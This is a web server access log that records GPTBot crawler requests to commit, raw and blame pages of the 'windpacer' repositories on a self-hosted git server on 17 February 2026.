+[17/Feb/2026:13:17:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 14804] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" +[17/Feb/2026:13:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e" [Client 74.7.227.38] [Length 10060] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:17:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea.patch" [Client 74.7.227.38] [Length 2311] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" +[17/Feb/2026:13:17:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:13:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 14557] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:13:17:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" +[17/Feb/2026:13:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 30] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" +[17/Feb/2026:13:17:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" +[17/Feb/2026:13:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" +[17/Feb/2026:13:17:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Services.tsx" +[17/Feb/2026:13:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" +[17/Feb/2026:13:17:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:17:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14651] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components" +[17/Feb/2026:13:17:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 14653] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components" +[17/Feb/2026:13:17:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/branches" [Client 74.7.227.38] [Length 10322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver" +[17/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 23722] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:17:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project" [Client 74.7.227.38] [Length 9866] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" [Client 74.7.227.38] [Length 10798] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:13:17:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" [Client 74.7.227.38] [Length 10772] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/code-frequency" [Client 74.7.227.38] [Length 7527] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:17:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" +[17/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 10137] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" +[17/Feb/2026:13:17:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" [Client 74.7.227.38] [Length 11837] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" +[17/Feb/2026:13:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:13:17:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:13:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:13:17:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 14561] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:13:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/Services.tsx" +[17/Feb/2026:13:17:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" [Client 74.7.227.38] [Length 10142] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:17:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20377] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:17:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20378] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:17:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:17:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23928] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:17:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 176802] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project" +[17/Feb/2026:13:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 23929] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project" +[17/Feb/2026:13:17:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Services.tsx" +[17/Feb/2026:13:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/recent-commits" [Client 74.7.227.38] [Length 7516] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" +[17/Feb/2026:13:17:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" [Client 74.7.227.38] [Length 10927] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" +[17/Feb/2026:13:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" +[17/Feb/2026:13:17:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" [Client 74.7.227.38] [Length 9915] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/.vscode" +[17/Feb/2026:13:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43164] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" +[17/Feb/2026:13:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Services.tsx" [Client 74.7.227.38] [Length 14649] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" +[17/Feb/2026:13:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 468113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:13:17:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" +[17/Feb/2026:13:17:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" +[17/Feb/2026:13:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71403] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp2.md" +[17/Feb/2026:13:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/.vscode" [Client 74.7.227.38] [Length 10112] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/.vscode" +[17/Feb/2026:13:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71403] [Gzip 21.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" +[17/Feb/2026:13:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp2.md" +[17/Feb/2026:13:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43163] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 